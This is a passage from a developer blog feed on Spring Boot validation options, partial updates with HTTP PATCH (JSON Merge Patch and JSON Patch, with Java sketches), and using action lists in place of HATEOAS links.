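<p>As a rough illustration, the decision logic might look like the following sketch. <span class="code">UpdateStatusResolver</span> and its parameters are hypothetical. The position of the 428 check relative to the other checks and the exact string comparison of a single ETag are assumptions of this example.</p>

```java
// Hypothetical sketch of the order in which an update request could be checked
class UpdateStatusResolver {

    static int resolveStatus(boolean requestValid, boolean resourceExists,
                             String ifMatch, String currentEtag) {
        // Normal request checks come first, so other errors are not hidden by 412
        if (!requestValid) {
            return 400; // Bad Request
        }
        if (!resourceExists) {
            return 404; // Not Found
        }
        // Assumption: this API requires all update requests to be conditional
        if (ifMatch == null) {
            return 428; // Precondition Required
        }
        // Preconditions are evaluated just before the update would be executed
        if (!ifMatch.equals(currentEtag)) {
            return 412; // Precondition Failed
        }
        return 200; // the update can be executed
    }
}
```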
<p> </p>
<h3><em>Interested in more REST related articles? Have a look at my <a href="https://www.mscharhag.com/p/rest-api-design" target="_blank">REST API design page</a>.</em></h3>
<p> </p>2021-02-18T17:09:49ZValidation in Spring Boot applicationsMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-02-01:34d5c511-4d46-45a6-a3cd-59e943bd55442021-02-02T22:09:43Z2021-02-02T22:09:54Z<p>Validation in Spring Boot applications can be done in many different ways. Depending on your requirements some ways might fit your application better than others. In this post we will explore the usual options to validate data in Spring Boot applications.</p>
<p>Validation is done by using the <a href="https://beanvalidation.org/2.0/" rel="nofollow" target="_blank">Bean Validation API</a>. The reference implementation for the Bean Validation API is <a href="https://hibernate.org/validator/" rel="nofollow" target="_blank">Hibernate Validator</a>.</p>
<p>All required dependencies are packaged in the Spring Boot starter POM <span class="code">spring-boot-starter-validation</span>. So usually all you need to get started is the following dependency:</p>
<pre class="brush: xml">
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-validation</artifactId>
</dependency>
</pre>
<p>Validation constraints are defined by annotating fields with appropriate Bean Validation annotations. For example:</p>
<pre class="brush: java">
public class Address {
@NotBlank
@Size(max = 50)
private String street;
@NotBlank
@Size(max = 50)
private String city;
@NotBlank
@Size(max = 10)
private String zipCode;
@NotBlank
@Size(max = 3)
private String countryCode;
// getters + setters
}</pre>
<p>I think these annotations are quite self-explanatory. We will use this <span class="code">Address</span> class in many of the following examples.</p>
<p>You can find a complete list of built-in constraint annotations in the <a href="https://beanvalidation.org/2.0/spec/#builtinconstraints" rel="nofollow" target="_blank">Bean Validation documentation</a>. Of course you can also define your own validation constraints by <a href="https://docs.jboss.org/hibernate/stable/validator/reference/en-US/html_single/#validator-customconstraints" rel="nofollow" target="_blank">creating a custom <span class="code">ConstraintValidator</span></a>.</p>
<p>Defining validation constraints is only one part. Next we need to trigger the actual validation. This can be done by Spring or by manually invoking a <span class="code">Validator</span>. We will see both approaches in the next sections.</p>
<h2>Validating incoming request data</h2>
<p>When building a REST API with Spring Boot it is likely you want to validate incoming request data. This can be done by simply adding the <span class="code">@Valid</span> annotation to the <span class="code">@RequestBody</span> method parameter. For example:</p>
<pre class="brush: java">
@RestController
public class AddressController {
@PostMapping("/address")
public void createAddress(@Valid @RequestBody Address address) {
// ..
}
}</pre>
<p>Spring now automatically validates the passed <span class="code">Address</span> object based on the previously defined constraints.</p>
<p>This type of validation is usually used to make sure the data sent by the client is syntactically correct. If the validation fails the controller method is not called and an HTTP 400 (Bad request) response is returned to the client. More complex business specific validation constraints should typically be checked later in the business layer.</p>
<h2>Persistence layer validation</h2>
<p>When using a relational database in your Spring Boot application, it is likely that you are also using Spring Data and Hibernate. Hibernate comes with support for Bean Validation. If your entities contain Bean Validation annotations, those are automatically checked when persisting an entity.</p>
<p>Note that the persistence layer should definitely not be the only location for validation. If validation fails here, it usually means that some sort of validation is missing in other application components. Persistence layer validation should be seen as the last line of defense. In addition to that, the persistence layer is usually too late for business related validation.</p>
<h2>Method parameter validation</h2>
<p>Another option is the <a href="https://www.mscharhag.com/spring/spring-method-parameter-validation" target="_blank">method parameter validation provided by Spring</a>. This allows us to add Bean Validation annotations to method parameters. Spring then uses an AOP interceptor to validate the parameters before the actual method is called.</p>
<p>For example:</p>
<pre class="brush: java">
@Service
@Validated
public class CustomerService {
public void updateAddress(
@Pattern(regexp = "\\w{2}\\d{8}") String customerId,
@Valid Address newAddress
) {
// ..
}
}</pre>
<p>This approach can be useful to validate data coming into your service layer. However, before committing to this approach you should be aware of its limitations as this type of validation only works if Spring proxies are involved. See my separate post about <a href="https://www.mscharhag.com/spring/spring-method-parameter-validation" target="_blank">Method parameter validation</a> for more details.</p>
<p>Note that this approach can make unit testing harder. In order to test validation constraints in your services you now have to bootstrap a Spring application context.</p>
<h2>Triggering Bean Validation programmatically</h2>
<p>In the previous validation solutions the actual validation is triggered by Spring or Hibernate. However, it can be quite viable to trigger validation manually. This gives us great flexibility in integrating validation into the appropriate location of our application.</p>
<p>We start by creating a <span class="code">ValidationFacade</span> bean:</p>
<pre class="brush: java">
@Component
public class ValidationFacade {
private final Validator validator;
public ValidationFacade(Validator validator) {
this.validator = validator;
}
public <T> void validate(T object, Class<?>... groups) {
Set<ConstraintViolation<T>> violations = validator.validate(object, groups);
if (!violations.isEmpty()) {
throw new ConstraintViolationException(violations);
}
}
}</pre>
<p>This bean accepts a <span class="code">Validator</span> as constructor parameter. <span class="code">Validator</span> is part of the Bean Validation API and responsible for validating Java objects. An instance of <span class="code">Validator</span> is automatically provided by Spring, so it can be injected into our <span class="code">ValidationFacade</span>.</p>
<p>Within the <span class="code">validate(..)</span> method we use the <span class="code">Validator</span> to validate a passed <span class="code">object</span>. The result is a <span class="code">Set</span> of <span class="code">ConstraintViolation</span>s. If no validation constraints are violated (= the object is valid) the <span class="code">Set</span> is empty. Otherwise, we throw a <span class="code">ConstraintViolationException</span>.</p>
<p>We can now inject our <span class="code">ValidationFacade</span> into other beans. For example:</p>
<pre class="brush: java">
@Service
public class CustomerService {
private final ValidationFacade validationFacade;
public CustomerService(ValidationFacade validationFacade) {
this.validationFacade = validationFacade;
}
public void updateAddress(String customerId, Address newAddress) {
validationFacade.validate(newAddress);
// ...
}
}</pre>
<p>To validate an object (here <span class="code">newAddress</span>) we simply have to call the <span class="code">validate(..)</span> method of <span class="code">ValidationFacade</span>. Of course we could also inject the <span class="code">Validator</span> directly in our <span class="code">CustomerService</span>. However, in case of validation errors we usually do not want to deal with the returned <span class="code">Set</span> of <span class="code">ConstraintViolation</span>s. Instead it is likely we simply want to throw an exception, which is exactly what <span class="code">ValidationFacade</span> is doing.</p>
<p>Often this is a good approach for validation in the service/business layer. It is not limited to method parameters and can be used with different types of objects. For example, we can load an object from the database, modify it and then validate it before we continue.</p>
<p>This approach is also easy to unit test as we can simply mock <span class="code">ValidationFacade</span>. In case we want real validation in unit tests, the required <span class="code">Validator</span> instance can be created manually (as shown in the next section). Neither case requires bootstrapping a Spring application context in our tests.</p>
<h2>Validating inside business classes</h2>
<p>Another approach is to move validation inside your actual business classes. When doing Domain Driven Design this can be a good fit. For example, when creating an <span class="code">Address</span> instance the constructor can make sure we are not able to construct an invalid object:</p>
<pre class="brush: java">
public class Address {
@NotBlank
@Size(max = 50)
private String street;
@NotBlank
@Size(max = 50)
private String city;
...
public Address(String street, String city) {
this.street = street;
this.city = city;
ValidationHelper.validate(this);
}
}</pre>
<p>Here the constructor calls a static <span class="code">validate(..)</span> method to validate the object state. This static <span class="code">validate(..)</span> method looks similar to the previously shown method in <span class="code">ValidationFacade</span>:</p>
<pre class="brush: java">
public class ValidationHelper {
private static final Validator validator = Validation.buildDefaultValidatorFactory().getValidator();
public static <T> void validate(T object, Class<?>... groups) {
Set<ConstraintViolation<T>> violations = validator.validate(object, groups);
if (!violations.isEmpty()) {
throw new ConstraintViolationException(violations);
}
}
}</pre>
<p>The difference here is that we do not obtain the <span class="code">Validator</span> instance from Spring. Instead, we create it manually by using:</p>
<pre class="brush: java">
Validation.buildDefaultValidatorFactory().getValidator()</pre>
<p>This way we can integrate validation directly into domain objects without relying on someone <em>outside </em>to validate the object.</p>
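<p>For comparison, the same constructor-level guarantee can be sketched without Bean Validation by using explicit checks. This is a different technique than the one shown above. <span class="code">ValidatedAddress</span> and <span class="code">requireText</span> are hypothetical names, and the checks only approximate <span class="code">@NotBlank</span> and <span class="code">@Size(max = 50)</span>.</p>

```java
// Hypothetical plain-Java variant: the constructor rejects invalid state itself
class ValidatedAddress {

    private final String street;
    private final String city;

    ValidatedAddress(String street, String city) {
        this.street = requireText(street, "street", 50);
        this.city = requireText(city, "city", 50);
    }

    // Roughly corresponds to @NotBlank combined with @Size(max = maxLength)
    private static String requireText(String value, String field, int maxLength) {
        if (value == null || value.isBlank()) {
            throw new IllegalArgumentException(field + " must not be blank");
        }
        if (value.length() > maxLength) {
            throw new IllegalArgumentException(field + " must not exceed " + maxLength + " characters");
        }
        return value;
    }

    String getStreet() {
        return street;
    }

    String getCity() {
        return city;
    }
}
```

<p>The annotation-based variant is usually preferable once the constraints are also needed elsewhere (for example in request validation), because the rules are then declared only once.</p>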
<h2>Summary</h2>
<p>We saw different ways to deal with validation in Spring Boot applications. Validating incoming request data is a good way to reject nonsense as early as possible. Persistence layer validation should only be used as an additional layer of safety. Method validation can be quite useful, but make sure you understand its limitations. Even if triggering Bean Validation programmatically takes a bit more effort, it is usually the most flexible way.</p>
<p>You can find the source code for the shown examples on <a href="https://github.com/mscharhag/blog-examples/tree/master/spring-validation" target="_blank">GitHub</a>.</p>2021-02-02T22:09:54ZREST: Partial updates with PATCHMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-01-13:b1e116a1-f1fc-4255-8732-015cf4b053372021-01-17T20:14:32Z2021-01-17T20:25:26Z<p>In previous posts we learned how to <a href="https://www.mscharhag.com/api-design/updating-resources-put" target="_blank">update/replace resources using the HTTP PUT operation</a>. We also learned about the <a href="https://www.mscharhag.com/api-design/http-post-put-patch" target="_blank">differences between POST, PUT and PATCH</a>. In this post we will now see how to perform partial updates with the HTTP PATCH method.</p>
<p>Before we start, let's quickly check why partial updates can be useful:</p>
<ul>
<li>Simplicity - If a client only wants to update a single field, a partial update request can be simpler to implement.</li>
<li>Bandwidth - If your resource representations are quite large, partial updates can reduce the amount of bandwidth required.</li>
<li>Lost updates - Resource replacements with PUT can be susceptible to the lost update problem. While partial updates do not solve this problem, they can help reduce the number of possible conflicts.</li>
</ul>
<h2>The PATCH HTTP method</h2>
<p>Unlike PUT or POST, the PATCH method is not part of the original HTTP RFC. It has later been added via <a href="https://tools.ietf.org/html/rfc5789" rel="nofollow" target="_blank">RFC 5789</a>. The PATCH method is neither <a href="https://www.mscharhag.com/api-design/http-idempotent-safe" target="_blank">safe nor idempotent</a>. However, PATCH is often used in an idempotent way.</p>
<p>A PATCH request can contain one or more requested changes to a resource. If more than one change is requested the server must ensure that all changes are applied atomically. The RFC says:</p>
<blockquote>
<p>The server MUST apply the entire set of changes atomically and never provide ([..]) a partially modified representation. If the entire patch document cannot be successfully applied, then the server MUST NOT apply any of the changes.</p>
</blockquote>
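<p>One simple way to get this all-or-nothing behaviour is to apply the changes to a working copy and only use the copy if every change succeeded. The following sketch assumes a resource represented as a flat <span class="code">Map</span>. <span class="code">AtomicPatch</span> and <span class="code">applyAll</span> are hypothetical names. With a database, a transaction would typically take this role.</p>

```java
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.function.Consumer;

// Hypothetical sketch: apply all changes or none of them
class AtomicPatch {

    static Map<String, Object> applyAll(Map<String, Object> current,
                                        List<Consumer<Map<String, Object>>> changes) {
        // Shallow copy: sufficient for flat maps, nested structures would need a deep copy
        Map<String, Object> workingCopy = new LinkedHashMap<>(current);
        for (Consumer<Map<String, Object>> change : changes) {
            // If a change throws, 'current' has not been touched
            change.accept(workingCopy);
        }
        return workingCopy;
    }
}
```

<p>The caller replaces the stored resource with the returned map only if no exception was thrown.</p>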
<p>The request body for PATCH is quite flexible. The RFC only says the request body has to contain instructions on how the resource should be modified:</p>
<blockquote>
<p>With PATCH, [..], the enclosed entity contains a set of instructions describing how a resource currently residing on the origin server should be modified to produce a new version. </p>
</blockquote>
<p>This means we do not have to use the same resource representation for PATCH requests as we might use for PUT or GET requests. We can use a completely different Media-Type to describe the resource changes.</p>
<p>PATCH can be used in two common ways which both have their own pros and cons. We will look into both of them in the next sections.</p>
<h2>Using the standard resource representation to send changes (JSON Merge Patch)</h2>
<p>The most intuitive way to use PATCH is to keep the standard resource representation that is used in GET or PUT requests. However, with PATCH we only include the fields that should be changed.</p>
<p>Assume we have a simple <em>product </em>resource. The response of a simple GET request might look like this:</p>
<pre>
GET /products/123
</pre>
<pre>
{
    "name": "Cool Gadget",
    "description": "It looks very cool",
    "price": 4.50,
    "dimension": {
        "width": 1.3,
        "height": 2.52,
        "depth": 0.9
    },
    "tags": ["cool", "cheap", "gadget"]
}</pre>
<p>Now we want to increase the <em>price</em>, remove the <em>cheap </em>tag and update the product <em>width</em>. To accomplish this, we can use the following PATCH request:</p>
<pre>
PATCH /products/123
{
    "price": 6.20,
    "dimension": {
        "width": 1.35
    },
    "tags": ["cool", "gadget"]
}</pre>
<p>Fields not included in the request should stay unmodified. In order to remove an element from the <em>tags</em> array we have to include all remaining array elements.</p>
<p>This usage of PATCH is called <em>JSON Merge Patch</em> and is defined in <a href="https://tools.ietf.org/html/rfc7396" rel="nofollow" target="_blank">RFC 7396</a>. You can think of it as a PUT request that only uses a subset of fields. Patching this way usually makes PATCH requests idempotent.</p>
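<p>The merge algorithm from RFC 7396 is short enough to sketch in plain Java. The example below assumes JSON documents have already been parsed into nested <span class="code">Map</span> and <span class="code">List</span> objects. <span class="code">JsonMergePatch</span> is a hypothetical class name, not a library API.</p>

```java
import java.util.LinkedHashMap;
import java.util.Map;

// Hypothetical sketch of the RFC 7396 merge algorithm on Map-based JSON documents
class JsonMergePatch {

    @SuppressWarnings("unchecked")
    static Object merge(Object target, Object patch) {
        if (!(patch instanceof Map)) {
            // Scalars and arrays replace the target value completely
            return patch;
        }
        Map<String, Object> result = new LinkedHashMap<>();
        if (target instanceof Map) {
            result.putAll((Map<String, Object>) target);
        }
        for (Map.Entry<String, Object> entry : ((Map<String, Object>) patch).entrySet()) {
            if (entry.getValue() == null) {
                // A null value in the patch removes the field
                result.remove(entry.getKey());
            } else {
                // Objects are merged recursively, everything else is replaced
                result.put(entry.getKey(), merge(result.get(entry.getKey()), entry.getValue()));
            }
        }
        return result;
    }
}
```

<p>Note that the target document is not modified. The merged document is returned as a new map, which makes it easy to validate the result before storing it.</p>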
<h2>JSON Merge Patch and null values</h2>
<p>There is one caveat with JSON Merge Patch you should be aware of: The processing of <em>null </em>values.</p>
<p>Assume we want to remove the <em>description </em>of the previously used <em>product </em>resource. The PATCH request looks like this:</p>
<pre>
PATCH /products/123
{
"description": null
}</pre>
<p>To fulfill the client's intent the server has to differentiate between the following situations:</p>
<ul>
<li>The <em>description</em> field is not part of the JSON document. In this case, the description should stay unmodified.</li>
<li>The <em>description </em>field is part of the JSON document and has the value <em>null</em>. Here, the server should remove the current description.</li>
</ul>
<p>Be aware of this differentiation when using JSON libraries that map JSON documents to objects. In strongly typed programming languages like Java it is likely that both cases produce the same result when mapped to a strongly typed object (the <em>description </em>field might result in being <em>null </em>in both cases).</p>
<p>So, when supporting <em>null </em>values, you should make sure you can handle both situations.</p>
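<p>One way to keep this distinction is to inspect the parsed JSON tree before mapping it to a typed object. The following sketch assumes the request body is available as a <em>Map</em> in which an explicit JSON <em>null</em> is stored as a Java <em>null</em> value. <em>FieldState</em> and the helper methods are hypothetical names used only for this example.</p>

```java
import java.util.Map;

final class NullAwarePatch {

    enum FieldState { ABSENT, NULL, VALUE }

    /** Classifies a field of a parsed JSON object. */
    static FieldState stateOf(Map<String, Object> patch, String field) {
        if (!patch.containsKey(field)) {
            return FieldState.ABSENT;    // field not sent: keep the current value
        }
        return patch.get(field) == null
                ? FieldState.NULL        // explicit null: remove the current value
                : FieldState.VALUE;      // new value: replace the current value
    }

    /** Returns the description that should be stored after applying the patch. */
    static String patchDescription(String current, Map<String, Object> patch) {
        switch (stateOf(patch, "description")) {
            case ABSENT:
                return current;
            case NULL:
                return null;
            default:
                return (String) patch.get("description");
        }
    }
}
```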
<h2>Using a separate Patch format</h2>
<p>As mentioned earlier it is fine to use a different media type for PATCH requests.</p>
<p>Again we want to increase the <em>price</em>, remove the <em>cheap </em>tag and update the product <em>width</em>. A different way to accomplish this might look like this:</p>
<pre>
PATCH /products/123
{
    "$.price": {
        "action": "replace",
        "newValue": 6.20
    },
    "$.dimension.width": {
        "action": "replace",
        "newValue": 1.35
    },
    "$.tags[?(@ == 'cheap')]": {
        "action": "remove"
    }
}</pre>
<p>Here we use <a href="https://goessner.net/articles/JsonPath/" rel="nofollow" target="_blank">JSONPath</a> expressions to select the values we want to change. For each selected value we then use a small JSON object to describe the desired action.</p>
<p>To replace simple values this format is quite verbose. However, it also has some advantages, especially when working with arrays. As shown in the example we can remove an array element without sending all remaining array elements. This can be useful when working with large arrays.</p>
<h2>JSON Patch</h2>
<p>A standardized media type to describe changes using JSON is JSON Patch (described in <a href="https://tools.ietf.org/html/rfc6902" target="_blank">RFC 6902</a>). With JSON Patch our request looks like this:</p>
<pre>
PATCH /products/123
Content-Type: application/json-patch+json
[
    {
        "op": "replace",
        "path": "/price",
        "value": 6.20
    },
    {
        "op": "replace",
        "path": "/dimension/width",
        "value": 1.35
    },
    {
        "op": "remove",
        "path": "/tags/1"
    }
]</pre>
<p>This looks a bit similar to our previous solution. JSON Patch uses the <em>op </em>element to describe the desired action. The <em>path </em>element contains a <a href="https://tools.ietf.org/html/rfc6901" rel="nofollow" target="_blank">JSON Pointer</a> (yet another RFC) to select the element to which the change should be applied.</p>
<p>Note that the current version of JSON Patch does not support removing an array element by value. Instead, we have to remove the element using the array index. With <em>/tags/1</em> we can select the second array element.</p>
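<p>To illustrate how <em>op</em> and <em>path</em> work together, the following Java sketch applies <em>replace</em> and <em>remove</em> operations to a document that has been parsed into mutable <em>Map</em> and <em>List</em> objects. It is only a rough approximation of RFC 6902: the other operations are not supported, the changes are not applied atomically, and all class and method names are assumptions made for this example.</p>

```java
import java.util.List;
import java.util.Map;

final class JsonPatchSketch {

    /** Applies "replace" and "remove" operations in order; the document is modified in place. */
    static void apply(Object document, List<Map<String, Object>> operations) {
        for (Map<String, Object> operation : operations) {
            String[] tokens = parsePointer((String) operation.get("path"));
            // Walk to the parent of the addressed element
            Object parent = document;
            for (int i = 0; i < tokens.length - 1; i++) {
                parent = child(parent, tokens[i]);
            }
            String last = tokens[tokens.length - 1];
            child(parent, last); // fails if the target location does not exist
            String op = (String) operation.get("op");
            if ("replace".equals(op)) {
                replace(parent, last, operation.get("value"));
            } else if ("remove".equals(op)) {
                remove(parent, last);
            } else {
                throw new UnsupportedOperationException("Unsupported op: " + op);
            }
        }
    }

    /** Splits a JSON Pointer (RFC 6901) into unescaped reference tokens. */
    static String[] parsePointer(String pointer) {
        if (pointer == null || !pointer.startsWith("/")) {
            throw new IllegalArgumentException("Unsupported pointer: " + pointer);
        }
        String[] tokens = pointer.substring(1).split("/", -1);
        for (int i = 0; i < tokens.length; i++) {
            // "~1" encodes "/" and "~0" encodes "~"; the order of replacement matters
            tokens[i] = tokens[i].replace("~1", "/").replace("~0", "~");
        }
        return tokens;
    }

    @SuppressWarnings("unchecked")
    private static Object child(Object node, String token) {
        if (node instanceof Map) {
            Map<String, Object> object = (Map<String, Object>) node;
            if (!object.containsKey(token)) {
                throw new IllegalArgumentException("No member named " + token);
            }
            return object.get(token);
        }
        if (node instanceof List) {
            // Array elements are addressed by their zero-based index
            return ((List<Object>) node).get(Integer.parseInt(token));
        }
        throw new IllegalArgumentException("Cannot resolve " + token + " on a scalar value");
    }

    @SuppressWarnings("unchecked")
    private static void replace(Object parent, String token, Object value) {
        if (parent instanceof Map) {
            ((Map<String, Object>) parent).put(token, value);
        } else {
            ((List<Object>) parent).set(Integer.parseInt(token), value);
        }
    }

    @SuppressWarnings("unchecked")
    private static void remove(Object parent, String token) {
        if (parent instanceof Map) {
            ((Map<String, Object>) parent).remove(token);
        } else {
            ((List<Object>) parent).remove(Integer.parseInt(token));
        }
    }
}
```

<p>Because array elements are addressed by index, the result of <em>/tags/1</em> depends on the current order of the array on the server.</p>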
<p>Before using JSON Patch, you should evaluate if it fulfills your needs and if you are fine with its limitations. In the issues of the GitHub repository <a href="https://github.com/json-patch/json-patch2" rel="nofollow" target="_blank">json-patch2</a> you can find a discussion about a possible revision of JSON Patch.</p>
<p>If you are using XML instead of JSON you should have a look at XML Patch (<a href="https://tools.ietf.org/html/rfc5261" rel="nofollow" target="_blank">RFC 5261</a>) which works similarly but uses XML.</p>
<h2>The Accept-Patch header</h2>
<p>The RFC for HTTP PATCH also defines a new response header for HTTP OPTIONS requests: <em>Accept-Patch</em>. With <em>Accept-Patch</em> the server can communicate which media types are supported by the PATCH operation for a given resource. The RFC says:</p>
<blockquote>
<p>Accept-Patch SHOULD appear in the OPTIONS response for any resource that supports the use of the PATCH method.</p>
</blockquote>
<p>An example HTTP OPTIONS request/response for a resource that supports the PATCH method and uses JSON Patch might look like this:</p>
<p>Request:</p>
<pre>
OPTIONS /products/123</pre>
<p>Response:</p>
<pre>
HTTP/1.1 200 OK
Allow: GET, PUT, POST, OPTIONS, HEAD, DELETE, PATCH
Accept-Patch: application/json-patch+json</pre>
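<p>A client could use this header to check which patch format a resource accepts before sending a PATCH request. The following Java sketch shows one possible way to evaluate the header value. The helper names are hypothetical, and the parsing is deliberately naive (it does not handle commas inside quoted media type parameters).</p>

```java
import java.util.Arrays;
import java.util.Locale;
import java.util.Set;
import java.util.stream.Collectors;

final class AcceptPatch {

    /** Parses an Accept-Patch header value into lower-cased media types without parameters. */
    static Set<String> mediaTypes(String headerValue) {
        return Arrays.stream(headerValue.split(","))
                .map(entry -> entry.split(";", 2)[0].trim().toLowerCase(Locale.ROOT))
                .filter(type -> !type.isEmpty())
                .collect(Collectors.toSet());
    }

    /** Checks if the given media type is listed in the Accept-Patch header value. */
    static boolean supports(String headerValue, String mediaType) {
        return mediaTypes(headerValue).contains(mediaType.toLowerCase(Locale.ROOT));
    }
}
```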
<h2>Responses to HTTP PATCH operations</h2>
<p>The PATCH RFC does not mandate how the response body of a PATCH operation should look. It is fine to return the updated resource. It is also fine to leave the response body empty.</p>
<p>The server usually responds to HTTP PATCH requests with one of the following <a href="https://www.mscharhag.com/api-design/http-status-codes">HTTP status codes</a>:</p>
<ul>
<li>204 (No Content) - The operation has been completed successfully and no data is returned.</li>
<li>200 (OK) - The operation has been completed successfully and the response body contains more information (for example the updated resource).</li>
<li>400 (Bad Request) - The request body is malformed and cannot be processed.</li>
<li>409 (Conflict) - The request is syntactically valid but cannot be applied to the resource. For example, it can be used with JSON Patch if the element selected by a JSON Pointer (the <em>path </em>field) does not exist.</li>
</ul>
<h2>Summary</h2>
<p>The PATCH operation is quite flexible and can be used in different ways. <em>JSON Merge Patch</em> uses standard resource representations to perform partial updates. <em>JSON Patch</em>, however, uses a separate PATCH format to describe the desired changes. It is also fine to come up with a custom PATCH format. Resources that support the PATCH operation should return the <em>Accept-Patch</em> header for OPTIONS requests.</p>
<h1>HATEOAS without links</h1>
<p>Michael Scharhag, https://www.mscharhag.com, 2020-12-01</p>
<p>Yes, I know this title sounds stupid, but I could not find something that fits better. So let me explain why I think that links in HATEOAS APIs are not always that useful.</p>
<p>If you don't know what HATEOAS is, I recommend reading my <a href="https://www.mscharhag.com/api-design/hypermedia-rest" target="_blank">Introduction to Hypermedia REST APIs</a> first.</p>
<p>REST APIs with HATEOAS support provide two main features for decoupling client and server:</p>
<ol>
<li>Hypermedia removes the need for the client to hard-code or construct URIs. This makes it easier for the server to evolve the REST API in the future.</li>
<li>The availability of links tells the client which operations can be performed on a resource. This avoids duplicating server logic on the client.<br />
For example, assume the client needs to decide if a payment button should be displayed next to an order. The logic for this might be:
<pre>
if (order.status == OPEN and order.paymentDate == null) {
    show payment button
}</pre>
With HATEOAS the client does not need to know this logic. The check simply becomes:
<pre>
if (order.links.getByRel("payment") != null) {
    show payment button
}</pre>
The server can now change the rule that decides when an order can be paid without requiring a client update.</li>
</ol>
<p>How useful these features are depends on your application, your system architecture and your clients.</p>
<p>The second point might not be a big deal for applications that mostly use CRUD operations. However, it can be very useful if your REST API is serving a more complex domain.</p>
<p>The first point depends on your clients and to a certain degree on your overall system architecture. If you provide an API for public clients it is very likely that at least some clients will hard-code request URIs and not use the links you provide. In this case, you lose the ability to evolve your API without breaking (at least some) clients.</p>
<p>If your clients do not use your API responses directly and instead expose their own API it is also unlikely that they will follow the links you return. For example, this can easily happen when using the <a href="https://samnewman.io/patterns/architectural/bff/" rel="nofollow" target="_blank">Backend for Frontend pattern</a>.</p>
<p>Consider the following example system architecture:</p>
<p><a href="https://www.mscharhag.com/files/2020/hateoas-actions-01.png" target="_blank"><img alt="bff-system-architecture" src="https://www.mscharhag.com/files/2020/hateoas-actions-01.png" style="width: 100%; max-width: 500px" /></a></p>
<p>A Backend Service is used by two other systems. Both systems provide user-interfaces which communicate with system specific backends. REST is used for all communication.</p>
<p>Assume a user performs an action using the Android-App (1). The App sends a request to the Mobile-Backend (2). Then, the Mobile-Backend might communicate with the Backend-Service (3) to perform the requested action. The Mobile-Backend can also pre-process, map or aggregate data retrieved from the Backend-Service before sending a response back to the Android-App.</p>
<p>Now back to HATEOAS.</p>
<p>If the Backend-Service (3) in this example architecture provides a Hypermedia REST API, clients can barely make use of HATEOAS related links.</p>
<p>Let's look at a sequence diagram showing the system communication to see the problem:</p>
<p><a href="https://www.mscharhag.com/files/2020/hateoas-actions-02.png" target="_blank"><img alt="bff-communication-example" src="https://www.mscharhag.com/files/2020/hateoas-actions-02.png" style="width: 100%; max-width: 820px" /></a></p>
<p>The Backend-Service (3) provides an API-Entrypoint which returns a list of all available operations with their request URIs. The Mobile-Backend (2) sends a request to this API-Entrypoint in regular intervals and caches the link list locally.</p>
<p>Now assume a user of the Android-App (1) wants to access a specific order. To retrieve the required information the Android-App sends a request to the Mobile-Backend (2). The URI for this request might have been retrieved from the Mobile-Backend's API-Entrypoint previously (not shown).</p>
<p>To retrieve the requested order from the Backend-Service the Mobile-Backend uses the <em>order-details</em> link from the cached link list. The Backend-Service returns a response with HATEOAS links. Here, the <em>order-payment</em> link indicates that the order can be paid. The Mobile-Backend now transforms the response to its own return format and sends it back to the Android-App.</p>
<p>The Mobile-Backend might also return a HATEOAS response. So link URIs from the Backend-Service need to be mapped to the appropriate Mobile-Backend URIs. Therefore the Mobile-Backend checks if an <em>order-payment</em> link is present in the Backend-Service response. If this is the case it adds an <em>order-payment</em> link to its own response.</p>
<p>Note the Mobile-Backend is only using the relations (<em>rel </em>fields) of the Backend-Service response. The URIs are discarded.</p>
<p>Now the user wants to pay the order. The Android-App uses the previously retrieved <em>order-payment</em> link to send a request to the Mobile-Backend. The Mobile-Backend has now lost the context of the previous Backend-Service response, so it has to look up the <em>order-payment</em> link in the cached link list. The process continues in the same way as the previous request.</p>
<p>In this example the Android-App is able to make use of HATEOAS related links. However, the Mobile-Backend cannot use the link URIs returned by Backend-Service responses (except for the API entry-point). If the Mobile-Backend is providing HATEOAS features the link relations from the Backend-Service might be useful. The URIs for Backend-Service requests are always looked up from the cached API-Entrypoint response.</p>
<h2>Communicate actions instead of links</h2>
<p>Unfortunately link construction is not always that simple and can take some extra time. This time is wasted if you know that your clients won't use these links.</p>
<p>Probably the easiest way to avoid logic duplication on the client is to ignore links and use a simple <em>actions </em>array in REST responses:</p>
<pre>
GET /orders/123
{
    "id": 123,
    "price": "$41.24 USD",
    "status": "open",
    "paymentDate": null,
    "items": [
        ...
    ],
    "actions": ["order-cancel", "order-payment", "order-update"]
}</pre>
<p>This way we can communicate possible actions without the need of constructing links. In this case the response tells us that the client is able to perform <em>cancel</em>, <em>payment </em>and <em>update</em> operations.</p>
<p>Note that this might not even increase coupling between the client and the server. Clients can still look up URIs for those actions in the API entry point without the need of hard-coding URIs.</p>
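<p>On the server, such an <em>actions </em>array can be derived from the same rules that would otherwise decide which links are added. The following Java sketch shows the idea. Only the payment rule (open and unpaid) is taken from the example above; the <em>Order</em> class, the <em>Status</em> values and the rules for <em>order-cancel</em> and <em>order-update</em> are assumptions made for this illustration.</p>

```java
import java.time.LocalDate;
import java.util.ArrayList;
import java.util.List;

final class OrderActions {

    enum Status { OPEN, SHIPPED, CANCELLED }

    /** Minimal stand-in for a real order entity. */
    static final class Order {
        final Status status;
        final LocalDate paymentDate; // null as long as the order is unpaid

        Order(Status status, LocalDate paymentDate) {
            this.status = status;
            this.paymentDate = paymentDate;
        }
    }

    /** Returns the names of all actions a client may currently perform on the order. */
    static List<String> actionsFor(Order order) {
        List<String> actions = new ArrayList<>();
        if (order.status == Status.OPEN) {
            actions.add("order-cancel"); // assumed rule: open orders can be cancelled
            if (order.paymentDate == null) {
                actions.add("order-payment"); // rule from the payment button example
            }
            actions.add("order-update"); // assumed rule: open orders can be updated
        }
        return actions;
    }
}
```

<p>The client check for the payment button then only has to test if the <em>actions </em>array contains <em>order-payment</em>.</p>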
<p>An alternative is to use standard link elements and just skip the <em>href </em>attribute:</p>
<pre>
GET /orders/123
{
    "id": 123,
    "price": "$41.24 USD",
    "status": "open",
    "paymentDate": null,
    "items": [
        ...
    ],
    "links": [
        { "rel": "order-cancel" },
        { "rel": "order-payment" },
        { "rel": "order-update" }
    ]
}</pre>
<p>However, it might be a bit confusing to return a <em>links </em>element without link URIs.</p>
<p>Obviously, you are leaving the standard path with both described ways. On the other hand, if you don't need links you probably don't want to use a standardized HATEOAS response format (like <a href="http://stateless.co/hal_specification.html" rel="nofollow" target="_blank">HAL</a>) either.</p>
<h1>Validation in Kotlin: Valiktor</h1>
